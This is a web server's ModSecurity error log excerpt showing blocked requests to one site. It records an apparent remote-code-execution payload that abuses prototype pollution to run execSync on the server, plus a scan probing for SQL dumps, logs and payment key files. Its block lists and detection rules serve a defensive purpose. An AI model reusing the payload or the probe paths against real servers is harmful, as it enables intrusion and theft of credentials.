"acWDrVUvoxVxnUPz0PAl8QAAAYg"] [Thu Mar 26 21:06:22.150191 2026] [:error] [pid 9794:tid 9817] [client 13.231.118.205:35042] [client 13.231.118.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "acWDrlUvoxVxnUPz0PAl9wAAAY0"] [Thu Mar 26 21:06:22.378451 2026] [:error] [pid 9794:tid 9821] [client 13.231.118.205:35042] [client 13.231.118.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "acWDrlUvoxVxnUPz0PAl-wAAAZE"] [Fri Mar 27 02:45:10.939844 2026] [:error] [pid 14876:tid 14927] [client 54.206.82.241:50646] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/backup.sql"] [unique_id "acXTFokvinLXBnMOctw5XgAAAVM"] [Fri Mar 27 02:45:11.226393 2026] [:error] [pid 14876:tid 14930] [client 54.206.82.241:50646] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/debug.log"] [unique_id "acXTF4kvinLXBnMOctw5YAAAAVY"] [Fri Mar 27 02:45:11.513011 2026] [:error] [pid 14876:tid 14928] [client 54.206.82.241:50646] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/database.sql"] [unique_id "acXTF4kvinLXBnMOctw5YwAAAVQ"] [Fri Mar 27 02:45:11.871904 2026] [:error] [pid 14876:tid 14909] [client 54.206.82.241:50646] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "acXTF4kvinLXBnMOctw5ZQAAAUE"] [Fri Mar 27 02:45:19.832794 2026] [:error] [pid 9794:tid 9815] [client 54.206.82.241:52164] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/dump.sql"] [unique_id "acXTH1UvoxVxnUPz0PCF3wAAAYs"] [Fri Mar 27 02:45:23.444639 2026] [:error] [pid 12709:tid 12734] [client 54.206.82.241:52730] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/log/error.log"] [unique_id "acXTI2QfBZyVfy7bFZVI5QAAANc"] [Fri Mar 27 02:45:29.511948 2026] [autoindex:error] [pid 12709:tid 12729] [client 54.206.82.241:53358] AH01276: Cannot serve directory /home/id/dev-unit.com/devweb-lastV/public/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://web.dev-unit.com/js [Fri Mar 27 02:46:22.793966 2026] [:error] [pid 14876:tid 14932] [client 54.206.82.241:59020] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/db_backup.sql"] [unique_id "acXTXokvinLXBnMOctw6QAAAAVg"] [Fri Mar 27 02:46:28.089925 2026] [:error] [pid 14876:tid 14916] [client 54.206.82.241:59580] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/error.log"] [unique_id "acXTZIkvinLXBnMOctw6UAAAAUg"] [Fri Mar 27 02:47:29.803757 2026] [:error] [pid 9794:tid 9827] [client 54.206.82.241:39340] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/logs/error.log"] [unique_id "acXToVUvoxVxnUPz0PCIcAAAAZc"] [Fri Mar 27 02:47:30.087356 2026] [:error] [pid 9794:tid 9805] [client 54.206.82.241:39340] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/php_error.log"] [unique_id "acXTolUvoxVxnUPz0PCIcgAAAYE"] [Fri Mar 27 02:47:40.051699 2026] [:error] [pid 14876:tid 14926] [client 54.206.82.241:40748] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/var/log/nginx/error.log"] [unique_id "acXTrIkvinLXBnMOctw7NwAAAVI"] [Fri Mar 27 02:47:40.337845 2026] [:error] [pid 14876:tid 14929] [client 54.206.82.241:40748] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/var/log/apache2/error.log"] [unique_id "acXTrIkvinLXBnMOctw7OwAAAVU"] [Fri Mar 27 02:47:41.874989 2026] [:error] [pid 12588:tid 12665] [client 54.206.82.241:40954] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/logs/application.log"] [unique_id "acXTrZ-_AO9Vzpmoz0Or_wAAAJU"] [Fri Mar 27 02:47:42.158120 2026] [:error] [pid 12588:tid 12663] [client 54.206.82.241:40954] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/app/logs/dev.log"] [unique_id "acXTrp-_AO9Vzpmoz0OsAAAAAJM"] [Fri Mar 27 02:47:42.441036 2026] [:error] [pid 12588:tid 12630] [client 54.206.82.241:40954] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/app/logs/prod.log"] [unique_id "acXTrp-_AO9Vzpmoz0OsAQAAAII"] [Fri Mar 27 02:48:07.485273 2026] [:error] [pid 12709:tid 12714] [client 54.206.82.241:44470] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/errors.log"] [unique_id "acXTx2QfBZyVfy7bFZVJtAAAAMM"] [Fri Mar 27 02:48:07.766181 2026] [:error] [pid 12709:tid 12716] [client 54.206.82.241:44470] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/Thumbs.db"] [unique_id "acXTx2QfBZyVfy7bFZVJtgAAAMU"] [Fri Mar 27 02:49:39.726117 2026] [:error] [pid 9794:tid 9827] [client 54.206.82.241:54692] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/storage/app/keys/stripe.key"] [unique_id "acXUI1UvoxVxnUPz0PCK-gAAAZc"] [Fri Mar 27 02:50:21.074857 2026] [:error] [pid 14876:tid 14916] [client 54.206.82.241:59524] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/keys/payment.key"] [unique_id "acXUTYkvinLXBnMOctw9WgAAAUg"] [Fri Mar 27 02:51:30.879333 2026] [:error] [pid 14876:tid 14913] [client 54.206.82.241:41284] [client 54.206.82.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/backup/stripe.old"] [unique_id "acXUkokvinLXBnMOctw-9gAAAUU"] [Fri Mar 27 02:51:32.452554 2026] 